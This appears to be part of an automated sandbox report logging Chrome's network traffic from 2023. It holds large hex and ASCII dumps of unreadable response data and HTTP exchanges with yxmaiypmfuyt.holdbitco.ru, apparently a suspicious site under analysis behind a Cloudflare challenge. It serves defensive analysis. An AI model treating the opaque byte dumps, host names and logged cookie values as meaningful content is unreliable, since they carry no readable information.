                                                                                                                                                                                                                                                                                                              Data Ascii: 'BnAI_UXj<>Bs1r8F8K,EOlCcCj:yE}]2vxS"4g085Y^J(O"'dxtKh^63O@)2nWGRce.Jt$1g3r!,9G
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC991INData Raw: 90 6a 65 63 39 fb cc bc 45 33 a7 a2 35 a0 55 03 d6 f7 8a 15 1a a8 b1 77 39 fd 0e f9 21 59 fd b0 78 a4 5a f2 dc e9 54 72 bf 41 92 25 38 ac cf 27 48 d3 6f 0e 65 1d 48 7a 7e 64 88 f1 36 bc 0d 6f c5 5b f1 f3 f8 79 aa 95 2c 16 32 6f d5 da c3 f5 e9 b9 60 9c 88 de 34 43 cd da 24 7e 97 f3 66 ff 3b b9 3e b0 ba cc e8 46 74 56 6b 7c 6e 23 1b 0a e1 e6 a0 4c cd d0 bd 26 5c e0 e3 29 3d 72 f8 4e 24 0d 48 3d 5a 59 52 52 9a 6f 7e 18 98 6c 94 7d de f6 dc ea d8 8c 22 5e 17 f6 8f 9b 4d ed 6d f6 4a 8f d2 62 06 80 23 f3 dc fd e4 ef 92 17 87 bc 45 59 7b 40 97 40 45 1b fa ba 3e b7 3d 97 79 36 73 4a 77 b4 5f 6a 5c 4a 60 28 e3 b2 18 3a c9 49 0c 23 ad 85 8a 50 4c 8b 58 33 d6 de 44 16 0c 4b 2b 9c 1d 62 23 04 6d 48 d5 a7 cd ea fe 1e c1 d2 93 a3 e7 ed bd b1 28 f0 59 e0 b8 36 3e 97 f1
                                                                                                                                                                                                                                                                                                              Data Ascii: jec9E35Uw9!YxZTrA%8'HoeHz~d6o[y,2o`4C$~f;>FtVk|n#L&\)=rN$H=ZYRRo~l}"^MmJb#EY{@@E>=y6sJw_j\J`(:I#PLX3DK+b#mH(Y6>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC994INData Raw: d2 2e 08 5e de 75 14 bd 63 5f 77 dd 1b 78 9e 18 66 fd a5 71 45 5d 43 84 c8 eb b5 d5 48 20 d2 d7 c9 0d fa 4c c0 75 3f 81 0c e3 67 53 68 79 fb 01 f0 45 a3 9f 23 7a de 50 97 9e 36 cf 7e 25 8b 87 ae 59 a9 b0 eb 8c ac 37 f7 28 be d8 eb 49 1c 61 a7 a6 59 9b 51 5f 25 3d d2 36 9f 9a 50 f7 5f 17 03 7c b6 5a f9 c4 79 f1 e0 4c 42 8b f4 3e c3 8c ad 75 00 3e 71 07 65 dc 82 c2 7c 2c ea f4 22 30 72 43 b7 4a 96 ed 87 59 e5 6a ea 45 63 29 fd b3 9a 55 17 64 c3 e4 d0 55 94 cd a4 eb 23 3b e8 29 89 eb f5 d5 2e d0 50 ac 52 26 4b 9e bb e4 c8 3a ae f7 d5 74 d0 55 2b 12 eb 1d 0f 83 30 81 d3 cf 73 7a 0f e3 39 91 ff 2c 85 a5 a8 04 41 a4 6f a4 b8 14 d1 9a e4 f5 9c 46 1c 8b 52 65 7d 64 6c 0c cd 03 67 1d 27 7d 09 4a 18 93 84 44 93 70 66 26 57 0b b2 c3 93 30 86 28 09 94 72 5c da cb 84
                                                                                                                                                                                                                                                                                                              Data Ascii: .^uc_wxfqE]CH Lu?gShyE#zP6~%Y7(IaYQ_%=6P_|ZyLB>u>qe|,"0rCJYjEc)UdU#;).PR&K:tU+0sz9,AoFRe}dlg'}JDpf&W0(r\
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC999INData Raw: 3e b8 8a f7 12 33 a9 0b 5b 67 2d 2d 37 df e5 80 f8 18 79 0f 8b 5a 7b 26 a0 6d 40 57 1f 03 8c 9d 84 41 28 e5 9a 5a b7 a5 72 9a 1c 2c c7 d3 2b 33 ee 84 03 2b 56 cc 14 34 7f 58 1f 6d 06 21 64 1a 2b ce 26 80 ee c8 b4 f6 aa bd d0 ed a6 c5 33 c6 3c 65 f6 d3 9f cd 14 13 7a 84 1f 18 2e 92 50 9d bd d3 d5 51 7d b9 8a ad 13 50 91 03 96 96 b6 98 80 59 17 56 54 be 22 c1 48 a7 fd 4d 77 94 9a 7a 5a e8 8e 35 c1 c9 42 bf ff 9c 37 09 32 d2 06 25 78 48 95 90 b6 f9 d4 5d 6f f5 5b 09 dc ba 28 43 54 34 56 a9 56 91 75 f2 22 66 26 47 80 52 80 d6 d2 b4 90 52 36 8b 43 b5 76 73 6b d4 f7 e1 5a 06 50 8b 40 e9 25 5f 64 bb 0e 7a 61 86 6b 45 3c 5f ad 8e 5f e5 ae bc 52 5e 04 70 d5 3c 7e 7c f1 22 7b 55 ab ee 45 60 ae 00 f7 e1 e8 7f 15 1f e9 ec 19 88 af c3 b8 a4 8b 8a d0 8e 79 fb 20 80 35
                                                                                                                                                                                                                                                                                                              Data Ascii: >3[g--7yZ{&m@WA(Zr,+3+V4Xm!d+&3<ez.PQ}PYVT"HMwzZ5B72%xH]o[(CT4VVu"f&GRR6CvskZP@%_dzakE<__R^p<~|"{UE`y 5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1003INData Raw: 4b a6 ad de 1d a1 24 57 94 8a 83 12 f2 85 b6 4f f1 d6 d6 5a 4d d1 71 04 fc 5c e4 2d 4e 4d 31 eb f0 c4 39 e9 5c 3c dd b4 ff 14 a8 61 6c 43 20 5c 9a 06 22 15 2a 6c c8 53 ce 8c a7 48 18 b7 ac ac 48 79 55 32 1b 1a 87 85 65 c4 fb da cb 64 30 ca 6e 25 b3 7c 9b b3 30 49 8f 61 ee 0a bf a4 7f 1e 74 92 4b 79 80 89 76 44 a9 32 65 87 92 31 88 b7 de c9 9a 85 4e 54 37 79 1d 61 25 21 14 06 46 e1 6f 6b 84 86 33 c4 64 3e 14 6c 6a db 17 8c 61 50 8b 44 2f 5f d1 ca 61 3d 59 2b e6 51 87 29 6c 14 04 5b 55 10 95 e5 14 11 1d 5f 75 c6 26 1b 6a 8f b3 e7 f7 a9 14 ea cf 6c a7 90 1b 2c 35 24 ea d8 ef 6e 36 e0 19 58 5f bb 74 49 cd a9 0d 9e 25 89 30 21 22 61 97 ca 87 92 7a 58 63 82 81 10 9d 01 0a c1 14 22 a9 e2 aa 76 f6 2a 0a 4a 2a b6 e9 f5 ec 32 0b ec 34 5f d6 b6 2f 14 b8 d2 80 46 24
                                                                                                                                                                                                                                                                                                              Data Ascii: K$WOZMq\-NM19\<alC \"*lSHHyU2ed0n%|0IatKyvD2e1NT7ya%!Fok3d>ljaPD/_a=Y+Q)l[U_u&jl,5$n6X_tI%0!"azXc"v*J*24_/F$
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1007INData Raw: ca 42 45 68 14 74 6d 3e c8 51 4c 16 0a 2c 0a 93 7e 2b 6a 13 50 eb 97 bb 9c e0 9f de 5c 21 a5 75 13 e5 2d a1 39 31 79 ec e3 a1 bf 64 a2 68 e2 55 35 0c 54 6a f2 82 d1 c6 b0 fb 32 0b 41 98 1d 24 05 03 51 15 a4 6d 3e 1b e8 b2 6d 3a dd 48 a0 37 3b 0a d4 5a 89 48 dd 92 d8 96 21 81 93 4b c3 b4 be 01 d3 da fc 15 a9 aa 2c ea 0b 66 45 04 18 d8 e3 16 33 25 35 14 e2 bb d7 30 94 e3 0b 78 78 b2 65 f2 ca e2 75 2e 6b 20 ba 09 3f e7 4e 0b c2 93 36 da a6 3d b5 8c f8 94 83 3b 4d 52 f7 33 ce 3b b7 49 f6 30 f8 c4 26 08 da 93 cc 27 02 52 ed 69 b4 c7 86 21 9b ce 41 a6 49 18 39 d1 9a 98 6c fc f9 cb 72 6b d9 8c 98 25 39 41 f8 aa ad 8e f0 71 1e 0a cc ab 6c 1d 1b fd 7b f0 c0 10 c7 65 84 47 0f fd c6 90 b8 c6 74 8e 18 6c 51 41 4e 33 ba 52 f8 49 5b 31 5c 0d 12 41 2e ea 03 8a 81 48 c8
                                                                                                                                                                                                                                                                                                              Data Ascii: BEhtm>QL,~+jP\!u-91ydhU5Tj2A$Qm>m:H7;ZH!K,fE3%50xxeu.k ?N6=;MR3;I0&'Ri!AI9lrk%9Aql{eGtlQAN3RI[1\A.H
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1010INData Raw: fa a6 24 0f 7e a3 3f b9 a5 ed 24 da 56 09 fe 4b 91 3e 06 66 51 a0 21 fb 11 8d b6 ce 2e 57 5b 72 be 5e 6f b5 55 09 fc 14 e9 7c df 0e b3 e7 de 3b 86 10 eb e7 83 5e 2b 05 7b bc 81 08 ca 69 9b d9 9e 3c af 3c 75 6b 30 8f 95 bf ec d5 27 b1 77 02 c3 bf 77 b7 06 47 c9 f2 91 d2 e8 20 ac a3 ff 0f 33 1f a3 05 92 89 d4 df 2b 6c 4a c0 5b 35 21 a9 93 94 9d 79 89 9c 94 be 3c 92 27 a4 15 25 12 38 05 7d e8 4f e5 7a c3 67 63 26 87 c3 46 39 e9 a4 c8 b5 86 b9 68 6c f0 7d bb 53 bd 37 a5 02 0a 2d a9 1f 4f c4 e4 3b a1 56 94 28 63 6c 51 7b c5 42 ad 56 5f e0 96 a3 57 48 0d 26 12 2a 2b 29 12 13 0d 07 5a c6 58 67 8f b9 df 1d 31 5b e0 f8 f9 b5 b0 52 10 29 0d d2 0d 32 3a d5 da 4d 3e 22 f8 e5 2d 2c 11 72 3b 6e ff 0d 10 53 48 05 fd 8a 48 46 af ea 0e 7f a9 52 af 82 1e b6 5e a3 18 97 79
                                                                                                                                                                                                                                                                                                              Data Ascii: $~?$VK>fQ!.W[r^oU|;^+{i<<uk0'wwG 3+lJ[5!y<'%8}Ozgc&F9hl}S7-O;V(clQ{BV_WH&*+)ZXg1[R)2:M>"-,r;nSHHFR^y
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1015INData Raw: 66 50 aa 2f 15 b2 10 43 9b 38 7f 88 1a 9d 07 39 52 0f 57 be 1c f8 87 06 62 ac 08 2e ed 10 55 b9 72 05 ab 07 80 01 8c 60 e4 f1 04 a8 4e 92 d2 3f c0 a7 33 98 0e 80 08 40 7a 5a 59 54 f0 40 13 ba c9 4b 5a 8c 62 42 c1 dc 85 d4 1e 16 0e ff a2 62 95 03 ae 82 ec d6 82 1b 62 c6 22 f1 f6 cd 43 55 29 05 60 55 82 aa 14 ba 30 9a c8 e5 10 32 46 e5 19 42 79 63 67 ae 7c 3e 8b 2f 48 0b 83 23 76 de 96 ab 61 d0 99 5c 58 88 af 39 9c f0 1d 75 6c cc df 94 91 0f 6c c8 1a b2 e1 f9 71 80 00 4b 8a 81 1d 98 5b ef 6a 0d 08 62 98 99 09 5c d3 b1 b4 3d c1 d9 8e 44 f7 44 9d e0 d2 9c 7c e8 6a 90 ed ea c8 59 3a e2 e6 e4 1f b4 f0 2b c5 76 e5 d5 4b b6 25 29 2f 18 23 f9 84 4a 45 c1 23 e4 9a 80 5f f6 ff 32 7c f5 5c 7b 30 10 f3 7e 80 27 86 95 9e d4 b3 f1 2a 76 1c c3 31 1c c5 51 41 4a b7 1a 83
                                                                                                                                                                                                                                                                                                              Data Ascii: fP/C89RWb.Ur`N?3@zZYT@KZbBbb"CU)`U02FBycg|>/H#va\X9ullqK[jb\=DD|jY:+vK%)/#JE#_2|\{0~'*v1QAJ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1019INData Raw: 20 d0 04 cc 4e 52 39 4e f6 da 9d b3 f3 8d bf 65 72 9a 92 fb 2f 26 fd e2 fc a6 7f 38 c0 27 c1 37 7f 7e 6e f1 57 b3 b4 73 b4 bf 6f 6e 74 23 c2 79 dc 86 db f0 d2 6a 2f 6d 31 c0 41 d8 f5 10 9c 12 75 8b 38 34 e0 98 6d 69 5c c0 77 32 ec f8 b0 44 0a 0d f1 de 71 63 c7 be e8 0c 07 bd b2 60 7f 7a bc 36 0a 7d f0 9a 47 59 2c 81 30 7e 7c aa 05 0d e1 f5 f9 88 22 ee 97 6c c2 46 f2 2c 61 5f 5b 34 eb 89 c3 87 3b 20 f7 fd cb af f8 82 00 61 e3 ac 0f e3 7b cb 36 43 8f fc 5e c2 8b 76 d5 a1 81 93 03 57 96 0d 96 4e 2e ca e8 cc c5 9c 52 8e 14 c4 f7 21 cb cb 85 6e 22 ac 21 4c db 1e 4b 0c 44 3d 6e cd 46 bb f7 9d dd 15 d2 38 70 b3 c1 d6 f0 b2 33 04 7d ca e1 aa 2a 0d 60 c1 73 86 a0 a5 28 2a 10 f2 71 53 a6 1a 25 4a 48 5e b8 fd 28 99 a9 d2 4c aa 2f ce 8f 88 eb 69 51 10 45 9e c0 d2 24
                                                                                                                                                                                                                                                                                                              Data Ascii: NR9Ner/&8'7~nWsont#yj/m1Au84mi\w2Dqc`z6}GY,0~|"lF,a_[4; a{6C^vWN.R!n"!LKD=nF8p3}*`s(*qS%JH^(L/iQE$
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1023INData Raw: a1 ae 21 34 3b 0d 00 53 08 8e a4 c2 e7 48 a8 96 9b 32 a1 73 c4 2a c5 ce 4f 76 26 fc d5 2e 46 7d 98 c1 e8 59 5b 04 93 f1 5a 6e 64 d8 89 4c 92 95 8f 76 46 c5 20 c9 6d c8 29 77 11 77 6f 66 98 4b 86 3a ba 1d 90 05 12 9c 35 2e 47 f4 e8 55 8d 6c 51 c1 50 f1 22 4c c3 b0 22 17 22 9d 8c fc 68 d9 da 4a 3b 9b c4 4f b3 e8 75 93 b6 cf a0 a2 20 4c 02 a6 f6 b9 db d4 b6 40 40 af 02 24 69 83 89 89 d4 1a 06 da 6a 9b 86 fc aa c7 8b 7e e4 c7 8f a9 c5 d9 1d e6 1a 36 07 68 3b 1b f7 59 fc fa 1a 10 ac 0a 01 42 d3 10 d2 92 42 4d f4 b2 a5 89 fd b6 94 dc 26 90 d7 55 06 63 6a 27 45 c6 5c da 72 24 14 a7 46 66 93 3e 53 75 4e 57 1f 73 b4 7a 60 15 12 f6 2f 1a 34 c8 db c7 c2 6a 1a 5a b1 09 2d d5 76 1b 69 f5 24 e8 4b ff b9 95 f5 d8 37 a8 af 1d 70 66 cf 28 6f b3 4d 4f 53 2b a7 ba 45 56 6a
                                                                                                                                                                                                                                                                                                              Data Ascii: !4;SH2s*Ov&.F}Y[ZndLvF m)wwofK:5.GUlQP"L""hJ;Ou L@@$ij~6h;YBBM&Ucj'E\r$Ff>SuNWsz`/4jZ-vi$K7pf(oMOS+EVj


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              76192.168.2.1649805104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1024OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/81bbd3f11f9128a6 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              77192.168.2.1649806104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC1024OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              78104.21.0.95443192.168.2.1649805C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1025INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:41 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                              cf-chl-out: dQKpLP6J6vjM67xbMZBKDA==$fp9izjrJcvxsPEZ6B9Fz6A==
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J8I70%2FF5if0I3ZOJT1VpkJ0%2F3RsDViHHj4MmpLieQnShCDKxFFtOYJ2OYysBnxanROVdwMtmFcorJfEl3hn0salg57S0ibXuEy27HdNizI4h0aVL%2BJy7zD6NvbQ%2FrxRTc%2FcyumgVp%2Bh%2BnSvu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd40dca69599e-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1026INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1026INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              79104.17.3.184443192.168.2.1649806C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1026INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:41 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              document-policy: js-profiling
                                                                                                                                                                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                                                                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                              referrer-policy: same-origin
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd40e1eca59f1-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1027INData Raw: 37 63 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: 7c19<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1027INData Raw: 3c 73 74 79 6c 65 3e 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 20 7b 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 74 72 6f 6b 65 20 7b 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 20 7b 0a 20 20 30 25 2c 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 20 20 35 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31 2c 20 31 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 20 7b
                                                                                                                                                                                                                                                                                                              Data Ascii: <style>@keyframes rotate { 100% { transform: rotate(360deg); }}@keyframes stroke { 100% { stroke-dashoffset: 0; }}@keyframes scale { 0%, 100% { transform: none; } 50% { transform: scale3d(1, 1, 1); }}@keyframes fill {
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1029INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 38 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: font-size: 16px; font-weight: 700;}p { margin: 8px 0; text-align: center; font-size: 20px; font-weight: 400;}#content { display: flex; align-items: center; justify-content: space-between; border: 1px solid #e0e0e0; background-col
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1030INData Raw: 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 30 33 38 31 32 37 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 33 38 31 32 37 3b 0a 7d 0a 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 3b 0a 7d 0a 2e 74 68 65 6d 65 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: rcle { stroke-dashoffset: 0; stroke-width: 2; stroke-miterlimit: 10; stroke: #038127; fill: #038127;}.theme-dark #success-icon { box-shadow: inset 0 0 0 #0aa937;}.theme-dark #success-icon .p1 { box-shadow: inset 0 0 0 #0aa937;}.theme-
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1031INData Raw: 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63
                                                                                                                                                                                                                                                                                                              Data Ascii: #challenge-error-title a { color: #bbb;}.theme-dark #challenge-error-title a:visited, .theme-dark #challenge-error-title a:link { color: #bbb;}.theme-dark #challenge-error-title a:hover, .theme-dark #challenge-error-title a:active, .theme-dark #c
